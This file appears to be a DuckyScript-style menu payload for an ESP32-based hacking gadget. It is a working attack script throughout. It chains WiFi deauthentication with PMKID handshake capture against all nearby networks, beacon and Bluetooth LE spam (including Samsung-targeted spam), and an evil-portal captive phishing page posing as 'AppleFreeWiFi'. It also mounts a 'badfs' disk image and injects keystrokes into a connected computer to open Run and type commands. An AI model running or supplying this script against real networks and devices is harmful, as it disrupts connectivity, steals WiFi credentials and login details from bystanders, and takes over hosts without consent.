LED 250 100 100 128
DISPLAY_PNG /files/WiFi.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/WiFiok.png
DELAY 50
DISPLAY_PNG /files/WiFi.png
DELAY 50
DISPLAY_PNG /files/Rickroll.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Rickroll...

ESP32M attack -t rickroll
DELAY 10000

DISPLAY_CLEAR
DISPLAY_PNG /files/Rickroll.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Deauth.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Deauth...

WEB_OFF
ESP32M scanap
DELAY 20000
DISPLAY_CLEAR
DISPLAY_PNG /files/Deauth.png
DISPLAY_TEXT 5 5 Deauthing >:]
ESP32M stopscan
ESP32M select -a all
ESP32M sniffpmkid -l -d
ESP32M sniffdeauth
DELAY 300000
REM *5 minutes*
DISPLAY_CLEAR
DISPLAY_PNG /files/Deauth.png
DISPLAY_TEXT 5 5 Done! Check SD

WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/WifiSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. WifiSpam...

ESP32M attack -t beacon -r

DISPLAY_CLEAR
DISPLAY_PNG /files/WifiSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/1exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
ESP32M stopscan
DISPLAY_PNG /more/WiFinext.png
DELAY 60
DISPLAY_PNG /files/WiFi.png
DISPLAY_PNG /files/Bluetooth.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Bluetoothok.png
DELAY 50
DISPLAY_PNG /files/Bluetooth.png
DELAY 50
DISPLAY_PNG /files/BtSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. iSpam

ESP32M blespam -t all

DELAY 1000
DISPLAY_PNG /files/BtSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/smSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. smSpam

ESP32M blespam -t samsung

DELAY 1000
DISPLAY_PNG /files/smSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/2exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Bluetoothnext.png
DELAY 60
DISPLAY_PNG /files/Bluetooth.png
DISPLAY_PNG /files/Broadcasting.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Broadcastingok.png
DELAY 50
DISPLAY_PNG /files/Broadcasting.png
DELAY 50
DISPLAY_PNG /files/Evilap.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Evilap...

DELAY 1000
WEB_OFF
ESP32M ssid -a -n AppleFreeWiFi
ESP32M select -a 1
ESP32M evilportal -c start -w apple.html

DISPLAY_CLEAR
DISPLAY_PNG /files/Evilap.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/3exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Broadcastingnext.png
DELAY 60
DISPLAY_PNG /files/Broadcasting.png
DISPLAY_PNG /files/Linux.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Linuxok.png
DELAY 50
DISPLAY_PNG /files/Linux.png
DELAY 50
DISPLAY_PNG /files/Badfs.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Badfs...

USB_MOUNT_DISK_READ_ONLY /badfs.img
DELAY 5000

DISPLAY_CLEAR
DISPLAY_PNG /files/Badfs.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/5exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Linuxnext.png
DELAY 60
DISPLAY_PNG /files/Linux.png
DISPLAY_PNG /files/Utilities.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Utilitiesok.png
DELAY 50
DISPLAY_PNG /files/Utilities.png
DELAY 50
DISPLAY_PNG /files/Script1.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 HID Rickrolling

ESP32M stopscan
GUI r
DELAY 1000
STRING https://www.youtube.com/watch?v=xvFZjo5PgG0
DELAY 1000
ENTER

DISPLAY_PNG /files/Script1.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Script2.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Script2

GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
F11
STRING color 5
ENTER
STRING dir /s
ENTER

DELAY 1000
DISPLAY_PNG /files/Script2.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/4exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Utilitiesnext.png
DELAY 60
DISPLAY_PNG /files/Utilities.png
ESP32M stopscan
RESTART_PAYLOAD